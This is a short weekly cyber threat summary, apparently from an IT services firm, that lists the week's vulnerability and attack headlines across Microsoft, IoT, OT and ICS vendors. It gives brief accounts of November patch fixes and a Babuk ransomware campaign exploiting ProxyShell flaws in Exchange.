C5 Technology Weekly Threat Summary extract…
There’s been a fair bit of action this week, particularly in the IoT, OT, and ICS space. Healthcare is again a hot target, Microsoft releases their monthly patches, and Palo’s GlobalProtect zero-day causing concern.
Here’s this weeks executive summary:
- Microsoft fixes Exchange server zero-day
- Zoho password manager torched by Godzilla webshell
- Sunwater unaware of cyber-attack for nine months
- Babuk ransomware seen exploiting ProxyShell vulnerabilities
- Healthcare & OT systems exposed to attacks
- Two NPM packages with 22 million weekly downloads found backdoored
- Critical flaws in Philips TASY EMR could expose patient data
- Multiple BusyBox security bugs threaten embedded Linux devices
- 14 new vulnerabilities discovered in BusyBox
- New Android spyware poses Pegasus-Like threat
- Palo Alto warns of Zero-Day bug in firewalls using GlobalProtect portal VPN
- Citrix application delivery controller, Citrix gateway, and Citrix SD-WAN WANOP edition appliance security update
- Nearly 100 TCP/IP stack vulnerabilities found during 18-month research project
General vulnerabilities: Microsoft, SAP, Adobe, Citrix, Samba, Apple, VMware
IoT, OT & ICS vulnerabilities: Philips, Schneider Electrics NMC, Schneider Electric GUIcon, Siemens Nucleus net, mySCADA, OSIsoft, OSIsoft PI Web API, Advantech, Siemens SIMATIC WinCC, Siemens Mendix, Siemens Mendix Studio Pro, Siemens SCALANCE W1750D, Siemens Nucleus RTOS-based APOGEE and TALON Products, Siemens NX OBJ Translator, Siemens Climatix POL909, Siemens SENTRON powermanager, WECON PLC Editor, Multiple Data Distribution Service (DDS) Implementations.
Microsoft’s November security updates contained fixes for fifty-five vulnerabilities, including six zero-day flaws. The flaw organizations should be most concerned about is CVE-2021-42298, a critical bug in Microsoft Defender that an attacker can exploit to remotely execute malicious code on vulnerable systems. Microsoft has self-assessed the flaw as severe.
A newly observed Babuk ransomware campaign is targeting ProxyShell vulnerabilities in Microsoft Exchange Server. Researchers spotted
signs that the attackers are leveraging a China Chopper webshell for the initial compromise, and then use that for the deployment of Babuk. Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the issues were addressed in April and May, with technical details made public in August. Researchers say that the Tortilla threat actor, active since July 2021, has started targeting the Exchange Server flaws. The infection chain features an intermediate unpacking module that is downloaded from pastebin.pl (a pastebin.com clone) and then decoded in memory before the final payload is decrypted and executed.